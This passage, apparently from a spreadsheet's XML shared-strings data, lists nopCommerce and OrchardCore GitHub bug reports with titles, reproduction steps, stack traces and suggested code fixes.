Microsoft.AspNetCore.Diagnostics.StatusCodePagesMiddleware.Invoke(HttpContext context) &gt; at Microsoft.AspNetCore.Diagnostics.StatusCodePagesMiddleware.Invoke(HttpContext context) &gt; at Microsoft.AspNetCore.Diagnostics.ExceptionHandlerMiddleware.Invoke(HttpContext context) &gt;</t>
  </si>
  <si>
    <t>https://github.com/nopSolutions/nopCommerce/issues/3468</t>
  </si>
  <si>
    <t>Shopping carts and wishlists page (admin). Product name is not displayed</t>
  </si>
  <si>
    <t>Right now it displays "null" instead of actual product names</t>
  </si>
  <si>
    <t>https://github.com/nopSolutions/nopCommerce/issues/3584</t>
  </si>
  <si>
    <t>Customer is Null when updating Return Request</t>
  </si>
  <si>
    <t>When i try to update the status of a return request the customer information is not populated at all, and so a null reference is thrown. Source: https://www.nopcommerce.com/boards/t/58325/customer-is-null-when-updating-return-request-local-environment-sqlexpress.aspx</t>
  </si>
  <si>
    <t>https://github.com/nopSolutions/nopCommerce/issues/3604</t>
  </si>
  <si>
    <t>Non-developer internal server error page not returning 500</t>
  </si>
  <si>
    <t>nopCommerce version: 4.1 Steps to reproduce the problem: Add a code or data change that causes an internal server error (e.g. adding a divide by zero to a controller's action) Run nop, making sure that the developer exception page is not enabled (see ApplicationBuilderExtensions's UseNopExceptionHandler) Navigate to the page that causes that error The response code will be something other than 500.</t>
  </si>
  <si>
    <t>https://github.com/nopSolutions/nopCommerce/issues/3630</t>
  </si>
  <si>
    <t>Return 404 page when a topic, blog post, news item cannot be loaded</t>
  </si>
  <si>
    <t>Right now it redirects to the home page</t>
  </si>
  <si>
    <t>https://github.com/nopSolutions/nopCommerce/issues/3751</t>
  </si>
  <si>
    <t>Redis serialization self-referencing loop for SpecificationAttributes</t>
  </si>
  <si>
    <t>nopCommerce version: 4.20 beta Steps to reproduce the problem: 1. Enable Redis caching 2. In admin panel, edit a product with specification attributes An internal server error occurs: `JsonSerializationException: Self referencing loop detected for property 'SpecificationAttribute' with type 'Castle.Proxies.SpecificationAttributeProxy'. Path '[0].SpecificationAttributeOptions[0]'.` The Models for `SpecificationAttribute` and `SpecificationAttributeOption` refer to each other so when they get serialized it's causing this circular reference error. Locally I added a `[JsonIgnore]` attribute to the `SpecificationAttributeOption`'s `SpecificationAttribute` property, which seems to fix the issue.</t>
  </si>
  <si>
    <t>https://github.com/nopSolutions/nopCommerce/issues/3946</t>
  </si>
  <si>
    <t>Registration activation with "+" in the email addres will not be successfull</t>
  </si>
  <si>
    <t>nopCommerce version: 4.20 Steps to reproduce the problem: If the activation link contains the email in an unescaped format like this (user+name@gmail.com) then the plus sign in the URL is represents a space, so the activation will not be successful for the email "user name@gmail.com". Source: Premium Support #14907</t>
  </si>
  <si>
    <t>https://github.com/nopSolutions/nopCommerce/issues/4432</t>
  </si>
  <si>
    <t>Cart page - No warning message displaying on apply discount coupon or gift card message</t>
  </si>
  <si>
    <t>nopCommerce version: 4.30 Beta Steps to reproduce the problem: Add few products to cart Then apply wrong coupon code or gift card code. It should display proper message but it nothing display. Current demo store(4.20) is display proper message. See this video - https://www.loom.com/share/5a87e2d190244363bc7f84bcaf5d2fac</t>
  </si>
  <si>
    <t>https://github.com/nopSolutions/nopCommerce/issues/4548</t>
  </si>
  <si>
    <t>Activity Types data table - Invalid JSON response when refresh grid</t>
  </si>
  <si>
    <t>nopCommerce version: 4.30 beta Steps to reproduce the problem: 1) Go /Admin/ActivityLog/ActivityTypes 2) scroll down and refresh table You will get this error **DataTables warning: table id=activityLogType-grid - Invalid JSON response. For more information about this error, please see http://datatables.net/tn/1**</t>
  </si>
  <si>
    <t>https://github.com/nopSolutions/nopCommerce/issues/4611</t>
  </si>
  <si>
    <t>Case sensitive ErrorPage.htm on Linux</t>
  </si>
  <si>
    <t>nopCommerce version: 4.20 Steps to reproduce the problem: Any server error on Linux. The file is named ErrorPage.htm in wwwroot but the Error action in ErrorController returns lower case errorpage.htm resulting in a 404 error.</t>
  </si>
  <si>
    <t>https://github.com/nopSolutions/nopCommerce/issues/4621</t>
  </si>
  <si>
    <t>GetAllCheckoutAttributes returns incorrect list of store-specific attributes</t>
  </si>
  <si>
    <t>nopCommerce version: 4.20 For example, if we have this setup: Stores: * Store1 (ID: **1**) * Store2 (ID: **2**) Checkout attributes: * Attribute1 (All stores - not limited) * Attribute2 (Limited to Store2) Calling `GetAllCheckoutAttributes(2)` while in the admin area of Store1, will only return Attribute1. Given that I'm passing in the store id of Store2, shouldn't that have returned both Attribute1 and Attribute2? Shouldn't this authorization check `_storeMappingService.Authorize(ca)` be passing in the `storeId` parameter instead? (i.e. `_storeMappingService.Authorize(ca, storeId)`). At the moment, the `storeId` parameter is not used anywhere to actually limit the list to that store. More info: https://github.com/nopSolutions/nopCommerce/blob/develop/src/Libraries/Nop.Services/Orders/CheckoutAttributeService.cs#L103</t>
  </si>
  <si>
    <t>https://github.com/nopSolutions/nopCommerce/issues/4717</t>
  </si>
  <si>
    <t>Empty "Name" fileld after adding new record to messages list in SendinBlue plugin</t>
  </si>
  <si>
    <t>nopCommerce version: 4.30 RC It should be set to some default value instead of empty string.</t>
  </si>
  <si>
    <t>https://github.com/nopSolutions/nopCommerce/issues/4919</t>
  </si>
  <si>
    <t>Display more user-friendly error when uploading non-picture file as a picture</t>
  </si>
  <si>
    <t>Steps to reproduce the problem: 1. Upload any non-picture file (e.g. XML or .cs) as a picture. For example, on a product details page 2. It gives a correct message that uploading failed. But also, 'Object reference not set to an instance of an object.' throwing error on picture controller side. Let's handle the exception so it's not thrown. There should be just an error text without an unhandled exception ![download](https://user-images.githubusercontent.com/5019111/86886520-c440dc80-c0ff-11ea-9869-c83c6e70e069.png) Source: https://www.nopcommerce.com/en/boards/topic/84221/picture-controller-in-get-error-object-reference-not-set-to-an-instance-of-an-object</t>
  </si>
  <si>
    <t>https://github.com/nopSolutions/nopCommerce/issues/4943</t>
  </si>
  <si>
    <t>Estimate Shipping - shipping provider warnings not displayed</t>
  </si>
  <si>
    <t>1. nopCommerce version 4.30 2. Expected behavior - error/warning messages from shipping providers should be displayed 3. Actual behavior - if a shipping provider plugin returns any errors, they are ignored 4. Steps to reproduce the problem - Select "Estimate Shipping" button on the cart page. The dialog pops up. - Enter address information - If the shipping provider plugin reports any errors (like UPS indicating invalid address, or Shipping Director's Error/ErrorExit rule returning a warning message like "call for shipping"), they are not displayed. (Note that if you blank out the zip/postal code field, you do see an error message for "Zip / postal code is required", so the dialog does support the display of messages) The code does not look right. Only when 'Success' is true does it enter the block where Warnings are set: \Presentation\Nop.Web\Factories\ShoppingCartModelFactory.cs csharp public virtual EstimateShippingResultModel PrepareEstimateShippingResultModel()  var getShippingOptionResponse = _shippingService.GetShippingOptions(); if (getShippingOptionResponse.Success) { if (getShippingOptionResponse.ShippingOptions.Any()) { foreach (var shippingOption in getShippingOptionResponse.ShippingOptions) {} } else foreach (var error in getShippingOptionResponse.Errors) model.Warnings.Add(error); }  see also: https://www.nopcommerce.com/en/boards/topic/84921/estimate-shipping-on-cart-page-for-430-shipping-provider-warnings-not-displayed</t>
  </si>
  <si>
    <t xml:space="preserve">Controller files were fixed </t>
  </si>
  <si>
    <t>https://github.com/nopSolutions/nopCommerce/issues/5198</t>
  </si>
  <si>
    <t>Don't throw an exception on incorrect model binding from URL params</t>
  </si>
  <si>
    <t>nopCommerce version: develop An exception may throw for example due to a type mismatch, when a model property is bool and the value comes in int. In this case the binding should just ignore the value and not throw an exception.</t>
  </si>
  <si>
    <t>https://github.com/nopSolutions/nopCommerce/issues/5359</t>
  </si>
  <si>
    <t>Country State Ajax loader is not stopped</t>
  </si>
  <si>
    <t>nopCommerce version: 4.40 Beta Steps to reproduce the problem: 1) Register new customer 2) Add any product to cart 3) Do checkout while filling the billing address click on country dropdown and select country ajax loader is continues loading. If state is filling based on country than also it is loading continuously. ![image](https://user-images.githubusercontent.com/41533502/108676031-9cc34680-750d-11eb-93b4-02288076bf31.png)</t>
  </si>
  <si>
    <t>https://github.com/nopSolutions/nopCommerce/issues/5368</t>
  </si>
  <si>
    <t>Selected Other State on admin edit address click on save it will success but it is not updated in DB</t>
  </si>
  <si>
    <t>nopCommerce version: 4.40 beta Steps to reproduce the problem: 1. Admin &gt; Edit Order 2. Click on Edit address 3. Select in State as "other", and click on save but it not reflected or updated https://prnt.sc/103n9t7</t>
  </si>
  <si>
    <t>https://github.com/nopSolutions/nopCommerce/issues/5384</t>
  </si>
  <si>
    <t>Can't properly decode an URL if it contains slugs names that are also parameter names.</t>
  </si>
  <si>
    <t>nopCommerce 4.3 Please read: [Link to NopCommerce](https://www.nopcommerce.com/en/boards/topic/90303/receiving-404-error-on-the-root-category-after-upgrade-to-43) Using a debugger, I set a breakpoint on Line 96 of Category  public virtual IActionResult Category(int categoryId, CatalogPagingFilteringModel command) { var category = _categoryService.GetCategoryById(categoryId); if (category == null || category.Deleted) return InvokeHttp404();   At first, I thought there was something wrong with my debugger setup because I couldn't hit the breakpoint www.store.com/products. When I clicked on another category, however, it worked. The 404 error wasn't generated in the Category method. I changed the slug name to "products-test" under **Catalog &gt; Categories &gt; "Products" &gt; Search engine friendly page name ** and it magically again hit my breakpoint. Very strange! I also tried to clear the Slug name, but it automatically generated "products" after the category name and still didn't hit the break point. Finally, I deleted the Slug in **System &gt; Search engine friendly page names** and the Slug field became blank. Navigating, however, to the page didn't result in a 404 error, but gave me a blank page. I checked my configuration to see if I had any URL redirections at the web server level, but I didn't have any. I also cleared the cache to rid any stale values from the system. I finally found the cause of the error. The fact "products" gave me a 404, but not other slug names lead me to suspect it may be a parsing issue. I tried "category"and "product" as a slug names and it also gave me 404 errors! The URL routing in NopCommerce 4.3 cannot handle cases where the Slug is the same as a parameter name! It appears the URL decoding has changed since 4.2. The best fix would be to either correct the URL decoding or add validation logic on all user entered slug names.</t>
  </si>
  <si>
    <t>https://github.com/nopSolutions/nopCommerce/issues/5400</t>
  </si>
  <si>
    <t>Adding a new forum display wrong error message / Admin side</t>
  </si>
  <si>
    <t>nopCommerce version: 4.40 Beta Steps to reproduce the problem: 1. Admin &gt; Forum -&gt; CreateForum 2. Click on Save or save and Continue Edit 3. display wrong error message of forum https://prnt.sc/104oq24</t>
  </si>
  <si>
    <t>https://github.com/nopSolutions/nopCommerce/issues/5469</t>
  </si>
  <si>
    <t>Required field condition is not checked at Shipping origin tab</t>
  </si>
  <si>
    <t>nopCommerce version : 4.40 beta Steps to reproduce the problem: 1) /Admin/Setting/Shipping 2) GO Shipping origin 3) Some of the field screen shot attached here Required field condition is not checked. **It will save with blank value.** ![image](https://user-images.githubusercontent.com/41533502/109268087-98aa6800-7830-11eb-84e3-4d12361556c7.png)</t>
  </si>
  <si>
    <t>https://github.com/nopSolutions/nopCommerce/issues/5553</t>
  </si>
  <si>
    <t>VisibleIndividually option ignored</t>
  </si>
  <si>
    <t>nopCommerce version: 4.40 Steps to reproduce the problem: - Set a product in the catalog so 'Visible individually' option is not selected. - Start the store where this product is available - In the search box or in the item by category list, the product appears when it should not Fix: - In Nop.Services\Catalog\ProductServices.cs, - In public virtual async Task&lt;IPagedList&lt;Product&gt;&gt; SearchProductsAsync - Check the value (after line 815) with the below code `if (visibleIndividuallyOnly) productsQuery = productsQuery.Where(p =&gt; p.VisibleIndividually);`</t>
  </si>
  <si>
    <t>https://github.com/nopSolutions/nopCommerce/issues/5746</t>
  </si>
  <si>
    <t>Sequence contains no elements</t>
  </si>
  <si>
    <t>nopCommerce version: 4.40.x Steps to reproduce the problem: We're getting a lot of 'Sequence contains no elements' errors in the logs, relating to '/catalog/getcatalogsubcategories' - we're using the ajax main menu. `System.InvalidOperationException: Sequence contains no elements at System.Linq.ThrowHelper.ThrowNoElementsException() at System.Linq.Enumerable.First[TSource](IEnumerable`1 source) at Nop.Web.Factories.CatalogModelFactory.PrepareSubCategoriesAsync(Int32 id) at Nop.Web.Controllers.CatalogController.GetCatalogSubCategories(Int32 id) at Microsoft.AspNetCore.Mvc.Infrastructure.ActionMethodExecutor.TaskOfIActionResultExecutor.Execute(IActionResultTypeMapper mapper, ObjectMethodExecutor executor, Object controller, Object[] arguments) at Microsoft.AspNetCore.Mvc.Infrastructure.ControllerActionInvoker.&lt;InvokeActionMethodAsync&gt;g__Awaited|12_0(ControllerActionInvoker invoker, ValueTask`1 actionResultValueTask) at Microsoft.AspNetCore.Mvc.Infrastructure.ControllerActionInvoker.&lt;InvokeNextActionFilterAsync&gt;g__Awaited|10_0(ControllerActionInvoker invoker, Task lastTask, State next, Scope scope, Object state, Boolean isCompleted) at Microsoft.AspNetCore.Mvc.Infrastructure.ControllerActionInvoker.Rethrow(ActionExecutedContextSealed context) at Microsoft.AspNetCore.Mvc.Infrastructure.ControllerActionInvoker.Next(State&amp; next, Scope&amp; scope, Object&amp; state, Boolean&amp; isCompleted) at Microsoft.AspNetCore.Mvc.Infrastructure.ControllerActionInvoker.InvokeInnerFilterAsync()  End of stack trace from previous location  at Microsoft.AspNetCore.Mvc.Infrastructure.ResourceInvoker.&lt;InvokeNextResourceFilter&gt;g__Awaited|24_0(ResourceInvoker invoker, Task lastTask, State next, Scope scope, Object state, Boolean isCompleted) at Microsoft.AspNetCore.Mvc.Infrastructure.ResourceInvoker.Rethrow(ResourceExecutedContextSealed context) at Microsoft.AspNetCore.Mvc.Infrastructure.ResourceInvoker.Next(State&amp; next, Scope&amp; scope, Object&amp; state, Boolean&amp; isCompleted) at Microsoft.AspNetCore.Mvc.Infrastructure.ResourceInvoker.InvokeFilterPipelineAsync()  End of stack trace from previous location  at Microsoft.AspNetCore.Mvc.Infrastructure.ResourceInvoker.&lt;InvokeAsync&gt;g__Logged|17_1(ResourceInvoker invoker) at Microsoft.AspNetCore.Routing.EndpointMiddleware.&lt;Invoke&gt;g__AwaitRequestTask|6_0(Endpoint endpoint, Task requestTask, ILogger logger) at WebMarkupMin.AspNetCore5.WebMarkupMinMiddlewareBase.Invoke(HttpContext context) at StackExchange.Profiling.MiniProfilerMiddleware.Invoke(HttpContext context) in C:\projects\dotnet\src\MiniProfiler.AspNetCore\MiniProfilerMiddleware.cs:line 125 at Microsoft.AspNetCore.Authorization.AuthorizationMiddleware.Invoke(HttpContext context) at Nop.Services.Authentication.AuthenticationMiddleware.InvokeAsync(HttpContext context) at FoxNetSoft.Plugin.Misc.CDNConnector.Infrastructure.CDNConnectorMiddleware.Invoke(HttpContext context) at Microsoft.AspNetCore.Localization.RequestLocalizationMiddleware.Invoke(HttpContext context) at Microsoft.AspNetCore.Session.SessionMiddleware.Invoke(HttpContext context) at Microsoft.AspNetCore.Session.SessionMiddleware.Invoke(HttpContext context) at Nop.Services.Installation.InstallUrlMiddleware.InvokeAsync(HttpContext context, IWebHelper webHelper) at Nop.Services.Common.KeepAliveMiddleware.InvokeAsync(HttpContext context, IWebHelper webHelper) at Microsoft.AspNetCore.ResponseCompression.ResponseCompressionMiddleware.Invoke(HttpContext context) at Microsoft.AspNetCore.Diagnostics.StatusCodePagesMiddleware.Invoke(HttpContext context) at Microsoft.AspNetCore.Diagnostics.StatusCodePagesMiddleware.Invoke(HttpContext context) at Microsoft.AspNetCore.Diagnostics.ExceptionHandlerMiddleware.&lt;Invoke&gt;g__Awaited|6_0(ExceptionHandlerMiddleware middleware, HttpContext context, Task task)` ![Screen Shot 2021-06-25 at 13 32 29](https://user-images.githubusercontent.com/12123259/123425273-d8544700-d5b9-11eb-8411-b58fe9038743.png)</t>
  </si>
  <si>
    <t>https://github.com/nopSolutions/nopCommerce/issues/5907</t>
  </si>
  <si>
    <t>Estimate shipping not applying on the shopping cart page</t>
  </si>
  <si>
    <t>&gt; I have found a bug in the Cart page where after selecting a shipping method it's not updating in the order summary section &gt; &gt; 1. nopCommerce version: 4.40.4 &gt; &gt; 2. Expected behavior: After selecting a shipping method order summary should show the selected &gt; shipping method and prices should adjust accordingly if applicable &gt; &gt; 3. Actual behavior: Order Summary not updating after selecting shipping method &gt; &gt; 4. Steps to reproduce the problem: Go to cart page after you have added products , then click on estimate shipping and select a shipping method &gt; &gt; 5. Any private modifications : No &gt; &gt; Reasons for the problem : &gt; An Invalid url parameter is being sent as a "$" sign is placed in the requested url . &gt; &gt; &gt; Solution : &gt; Remove `$` sign from the the following cshtml =&gt; [src/Presentation/Nop.Web/Views/Shared/Components/ShoppingCartEstimateShipping/Default.cshtml](https://github.com/nopSolutions/nopCommerce/blob/develop/src/Presentation/Nop.Web/Views/Shared/Components/ShoppingCartEstimateShipping/Default.cshtml#L57) &gt; where a ajax request is being sent to the following route "shoppingcart/selectshippingoption" Source: https://www.nopcommerce.com/boards/topic/92236/cart-page-estimate-shipping-not-applying-bug</t>
  </si>
  <si>
    <t>https://github.com/nopSolutions/nopCommerce/issues/5990</t>
  </si>
  <si>
    <t>Estimate shipping not applying on the shopping cart page when enabled setting "Use a city name for estimate shipping"</t>
  </si>
  <si>
    <t>nopCommerce version: 4.50 Steps to reproduce the problem: Turn on the "Use city name to estimate shipping" option and try calculating shipping on the shopping cart page. You will receive a validation error for the ZipPostalCode field, which should not be validated in this case.</t>
  </si>
  <si>
    <t>https://github.com/nopSolutions/nopCommerce/issues/6007</t>
  </si>
  <si>
    <t>Do not allow to delete the only one template (category, manufacturer, product, topic)</t>
  </si>
  <si>
    <t>nopCommerce version: 4.5 beta Steps to reproduce the problem: step 1 : Go Admin/Template/List step 2: delete manufacture and category template step 3 : open detail page of both template at front end you will get internal server error. **Note** : validation is there at least one template is there. https://www.loom.com/share/5c691d9e162f4feba4a902e57442ebd3</t>
  </si>
  <si>
    <t>https://github.com/nopSolutions/nopCommerce/issues/6033</t>
  </si>
  <si>
    <t>Reset password does not work when an email contains a +</t>
  </si>
  <si>
    <t>nopCommerce version: Latest Steps to reproduce the problem: - Create an account with an email like "test+test@gmail.com" - Send the password reset link - The URL in the email will contain "email=test+test@gmail.com" which model binds in MVC to email="test test@gmail.com". - Clicking the reset link sends you to the homepage and does not allow you to reset your password The URL parameters should be escaped as "email=test%2Btest@gmail.com". In a URL, the + acts as a space. It appears this is caused in MessageTokenProvider.cs. ![image](https://user-images.githubusercontent.com/214307/146073863-d955273f-67b0-4019-b362-0557a4609845.png) `urlHelper.RouteUrl(routeName, routeValues))` results in a properly escaped URL. But when you pass this into the PathString constructor, it escapes everything. You then UrlDecode it later resulting in an unecoded + in the email value. Microsoft's documentation specifically says not to use PathString with an encoded URL. I don't have time to issue a pull request now but we fixed it by doing this: ![image](https://user-images.githubusercontent.com/214307/146074406-95ef1780-b03d-48df-9644-91511893969e.png)</t>
  </si>
  <si>
    <t>https://github.com/nopSolutions/nopCommerce/issues/6403</t>
  </si>
  <si>
    <t>Add missed vendor access check to orders</t>
  </si>
  <si>
    <t>nopCommerce version: 4.50.4 Steps to reproduce the problem: The /Admin/Orders/PdfInvoice does not sufficiently check if a vendor should have access to an invoice https://github.com/nopSolutions/nopCommerce/blob/23e3edf92ccaa4887d2aa8e4b5939eb97d1a1efa/src/Presentation/Nop.Web/Areas/Admin/Controllers/OrderController.cs#L906</t>
  </si>
  <si>
    <t>https://github.com/nopSolutions/nopCommerce/issues/6444</t>
  </si>
  <si>
    <t>Search by ipaddress on customer search page list not working properly</t>
  </si>
  <si>
    <t>nopCommerce version: 460beta Steps to reproduce the problem: Search by ipaddress on customer search page list not working properly domain/Admin/Customer/List Search in ip address with space and without space before number 172.70.218.52</t>
  </si>
  <si>
    <t>https://github.com/nopSolutions/nopCommerce/issues/6458</t>
  </si>
  <si>
    <t>News details page Redirect page not found after reload</t>
  </si>
  <si>
    <t>nopCommerce version: 4.60- Beta Steps to reproduce the problem: - Open news details page, (*) sing are missing for validation - Submit new Comment without putting title and comment - Now page url will change /nopcommerce-new-release to /News/NewsCommentAdd?newsitemid=2 - Please Refresh Page from URL - You will redirect into **Page not found** page</t>
  </si>
  <si>
    <t>https://github.com/nopSolutions/nopCommerce/issues/6484</t>
  </si>
  <si>
    <t>Estimate Shipping Errors not showing</t>
  </si>
  <si>
    <t>nopCommerce version: 4.50.3 Steps to reproduce the problem: Errors provided by the Property Error in GetShippingOptionResponse is not being shown in frontend. In Nop.Services.Shipping.GetShippingOptionsResponse: csharp  &lt;summary&gt;  Gets a value indicating whether request has been completed successfully  &lt;/summary&gt; public bool Success =&gt; !Errors.Any();  It says that Success is only True when there are no Errors. But: On Nop.Web.Factories.ShoppingCartModelFactory: csharp var getShippingOptionResponse = await _shippingService.GetShippingOptionsAsync(cart, address, customer, storeId: store.Id); if (getShippingOptionResponse.Success) { if (getShippingOptionResponse.ShippingOptions.Any()) { foreach (var shippingOption in getShippingOptionResponse.ShippingOptions) { rawShippingOptions.Add(new ShippingOption { Name = shippingOption.Name, Description = shippingOption.Description, Rate = shippingOption.Rate, TransitDays = shippingOption.TransitDays, ShippingRateComputationMethodSystemName = shippingOption.ShippingRateComputationMethodSystemName }); } } else { foreach (var error in getShippingOptionResponse.Errors) model.Errors.Add(error); } }  So The errors will only add when if (getShippingOptionResponse.Success) is True But Success indicate no errors. When Success is False, the code that add the errors will not execute. This is causing estimate Shipping Errors not showing on estimateshipping popup. Thx</t>
  </si>
  <si>
    <t>https://github.com/nopSolutions/nopCommerce/issues/6610</t>
  </si>
  <si>
    <t>In My Account-Addresses section, address gets saved when 'country'(required field) is kept empty.</t>
  </si>
  <si>
    <t>nopCommerce version: 4.60.2 Steps to reproduce the problem: 1. Open My Account-Addresses menu. 2. Click on "ADD NEW" button. 3. Enter data in all fields except in "Country" field(do not select any country). 4. Click on "SAVE" button. 5. Check that the address gets saved successfully. ![MicrosoftTeams-image](https://user-images.githubusercontent.com/121164051/220570342-95fa71ef-e5ba-4359-a75c-438d3a68328f.png)</t>
  </si>
  <si>
    <t>https://github.com/nopSolutions/nopCommerce/issues/6686</t>
  </si>
  <si>
    <t>Wrong product URL in email message</t>
  </si>
  <si>
    <t>nopCommerce version: 4.60 Steps to reproduce the problem: We have created new message template for products and in MessageTokenProvide.cs at method AddProductTokensAsync the line  await RouteUrlAsync(routeName: "Product", routeValues: new { SeName = await _urlRecordService.GetSeNameAsync(product) });  returns always empty string. We changed the route name to "ProductDetails" and the URL is now correct. But I think, here should be used something similar like in the RouteProductUrlAsync (NopUrlHelper.cs) where is much complex logic for creating product url.</t>
  </si>
  <si>
    <t>https://github.com/nopSolutions/nopCommerce/issues/6723</t>
  </si>
  <si>
    <t>400 bad request when trying to cancel/edit large order</t>
  </si>
  <si>
    <t>nopCommerce version: 4.60.3 Steps to reproduce the problem: The order that I'm working with has 432 items. When i try to cancel the order with the `cancel` button, or perform a manual status change, the change fails and the user receives a blank page. Dev tools and nop log show 400 bad request. Since the edit page is one big form that posts all input values regardless of what action is being taken on the order, and each order item has 6 attributes being posted, this results in 2,592 form fields being posted + approximately 25 other fields. So, the edit form for this order is submitting over 2,600 fields. This exceeds the default value of 1024 for the `RequestFormLimits` action attribute. I ran into a similar problem when developing a plugin for wholesale ordering. The best fix, in my opinion would involve limiting the form fields to only submit the values to what is necessary for what is being changed. The quick, less secure/robust fix would be adding `[DisableRequestSizeLimit]`, `[RequestFormLimits(ValueCountLimit = int.MaxValue, KeyLengthLimit = int.MaxValue)]` attributes to the `CancelOrder` action and other edit related actions which could suffer from this same issue. I can certainly apply the attribute overrides to my local build to get it working, but I would like to see a more robust upstream fix for this.</t>
  </si>
  <si>
    <t>https://github.com/nopSolutions/nopCommerce/issues/6859</t>
  </si>
  <si>
    <t>MultiPage-Checkout: edit address redirects to 404 when state not selected</t>
  </si>
  <si>
    <t>nopCommerce version: 4.60.1+ (unable to reproduce in 4.60.0) Steps to reproduce the problem: 1. Make sure the following prerequisites are in place a) One page checkout is disabled b) State / province setting for Addresses enabled 2. Put an item in your cart and start an checkout. Proceed to the billing address page 3. Make sure you have an address that you can edit (if not, create a new one first and place an order with it, so that the address gets properly saved) 4. Edit an address 5. Select a country with states, but do not touch the state. If there is already a state set, please select "Select state" 6. Click "Next" You will be redirect to the 404 page not found page. Expected behavior: Show an error message, indicating that a state needs to be selected.</t>
  </si>
  <si>
    <t>https://github.com/nopSolutions/nopCommerce/issues/7101</t>
  </si>
  <si>
    <t>Add more checks when validate shopping cart item attributes</t>
  </si>
  <si>
    <t>nopCommerce version: 4.60 &gt; 1. Create a new nop installation, including the demo data (no plugins, no themes). &gt; 2. Go to "Nike Tailwind Loose Short-Sleeve Running Shirt" in the frontend &gt; 3. Select size "Small" &gt; 4. Add the product to the cart, and place the order. &gt; 5. Open exactly the same product in the backend &gt; 6. Delete the product attribute value "small" from within the backend &gt; 7. Navigate to the frontend, "My Account &gt; Orders" and select the last order &gt; 8. Press "Rebuy" and wait for redirect into the shopping cart &gt; &gt; And here is the problem. Once you are in the shopping cart you can see that there is already something weird happing. There is no product attribute description displayed. If you have a look at the database, your shopping cart item still contains the old product attribute Id that you previously deleted. &gt; &gt; 9. Place the order &gt; &gt; You were now successfully able to purchase a product (product attribute value) that no longer exists. Source: https://www.nopcommerce.com/boards/topic/98780/inconsistent-product-attribute-handling-in-reorder-functionality</t>
  </si>
  <si>
    <t>https://github.com/nopSolutions/nopCommerce/issues/7106</t>
  </si>
  <si>
    <t>CustomProperties have been marked as JsonIgnore</t>
  </si>
  <si>
    <t>We use this property to extend the models by attaching data to them and passing the models to javascript. With the latest changes (see below) we are not able to do that anymore. Is there an alternative solution for us now if you have made this on purpose? How could we pass additional data to the exisiting models and use it in js? https://github.com/nopSolutions/nopCommerce/blob/8c45936960958d75eac5097bcf69fe88c8d10274/src/Presentation/Nop.Web.Framework/Models/BaseNopModel.cs#L42</t>
  </si>
  <si>
    <t>https://github.com/nopSolutions/nopCommerce/issues/7212</t>
  </si>
  <si>
    <t>Import orders. Set the region depending on the country</t>
  </si>
  <si>
    <t>nopCommerce version: 4.70 When importing orders, the state code is reading the first matching value from the StateProvince table without regard for what country was specified. See also #7211</t>
  </si>
  <si>
    <t>https://github.com/nopSolutions/nopCommerce/issues/7308</t>
  </si>
  <si>
    <t>AJAX catalog requests should be converted from GET to POST</t>
  </si>
  <si>
    <t>**nopCommerce version: 4.70.4** URL from Google results redirects to page without CSS In continuation of https://github.com/nopSolutions/nopCommerce/issues/7286. We should not allow to directly access them with GET (convert them to POST if possible)</t>
  </si>
  <si>
    <t>https://github.com/nopSolutions/nopCommerce/issues/7314</t>
  </si>
  <si>
    <t>RePostPayment fails with System.InvalidOperationException: Headers are read-only, response has already started.</t>
  </si>
  <si>
    <t>nopCommerce version: 4.6+ Steps to reproduce the problem: Calling RePostPayment fails with "System.InvalidOperationException: Headers are read-only, response has already started." at Microsoft.AspNetCore.Server.Kestrel.Core.Internal.Http.HttpHeaders.ThrowHeadersReadOnlyException() at Microsoft.AspNetCore.Server.Kestrel.Core.Internal.Http.HttpResponseHeaders.Microsoft.AspNetCore.Http.IHeaderDictionary.set_ContentType(StringValues value) at Microsoft.AspNetCore.Http.DefaultHttpResponse.set_ContentType(String value) at Microsoft.AspNetCore.Mvc.Infrastructure.ContentResultExecutor.ExecuteAsync(ActionContext context, ContentResult result) at Microsoft.AspNetCore.Mvc.Infrastructure.ResourceInvoker.&lt;InvokeNextResultFilterAsync&gt;g__Awaited|30_0[TFilter,TFilterAsync](ResourceInvoker invoker, Task lastTask, State next, Scope scope, Object state, Boolean isCompleted) at Microsoft.AspNetCore.Mvc.Infrastructure.ResourceInvoker.Rethrow(ResultExecutedContextSealed context) at Microsoft.AspNetCore.Mvc.Infrastructure.ResourceInvoker.ResultNext[TFilter,TFilterAsync](State&amp; next, Scope&amp; scope, Object&amp; state, Boolean&amp; isCompleted) at Microsoft.AspNetCore.Mvc.Infrastructure.ResourceInvoker.InvokeResultFilters()  End of stack trace from previous location  https://github.com/nopSolutions/nopCommerce/blob/020f7571c2f37beedc33c8bfb04ab53565623c1b/src/Presentation/Nop.Web/Controllers/OrderController.cs#L237 Will write the form to the body. https://github.com/nopSolutions/nopCommerce/blob/020f7571c2f37beedc33c8bfb04ab53565623c1b/src/Presentation/Nop.Web/Controllers/OrderController.cs#L242 Will try to set Content Type header because of Content("Redirected").  Consider "return new EmptyResult()" instead of "Content("Redirected")", along with adding a &lt;noscript&gt; wrapped text "please enable javascript" or similar, to RemotePost https://github.com/nopSolutions/nopCommerce/blob/020f7571c2f37beedc33c8bfb04ab53565623c1b/src/Presentation/Nop.Web.Framework/RemotePost.cs#L115</t>
  </si>
  <si>
    <t>https://github.com/nopSolutions/nopCommerce/issues/7490</t>
  </si>
  <si>
    <t>Error messages aren't showing on uploading pictures for product</t>
  </si>
  <si>
    <t>nopCommerce version: 4.80 Steps to reproduce the problem: Json-responses containing an error message aren't displayed on client side when picture uploading fails</t>
  </si>
  <si>
    <t>https://github.com/OrchardCMS/OrchardCore/issues/5533</t>
  </si>
  <si>
    <t>Ajax call to 'api/queries/{name}' fails</t>
  </si>
  <si>
    <t>Hello everyone, I'm currently trying to receive query results using an AJAX call: javascript var products = $.ajax({ type: "POST", url: "api/queries/ProductList", contentType: "application/json; charset=utf-8", dataType: "json", data: JSON.stringify({ parameters: { from: 0, size: 8 }}), });  but it fails with _"System.InvalidCastException: Null object cannot be converted to a value type."_ This happens because Task&lt;IActionResult&gt; Query( string name, string parameters) always get parameters equals to null and instantiate an empty Dictionary. LuceneQueryService tries to get the value at the var size = sizeProperty?.Value&lt;int&gt;() ?? 50; line and fails. All the required permissions for Queries are granted. Could someone point me on what I'm doing wrong, please?</t>
  </si>
  <si>
    <t>https://github.com/OrchardCMS/OrchardCore/issues/5694</t>
  </si>
  <si>
    <t>"Attached" Media Field No Longer Able to Upload File</t>
  </si>
  <si>
    <t xml:space="preserve">I am trying to determine what changed and will add an update here when available. As of right now though (code updated a couple of days ago) a Media Field set up as "Attached" will throw an error of  {Field Name}: There was an error handling the files. </t>
  </si>
  <si>
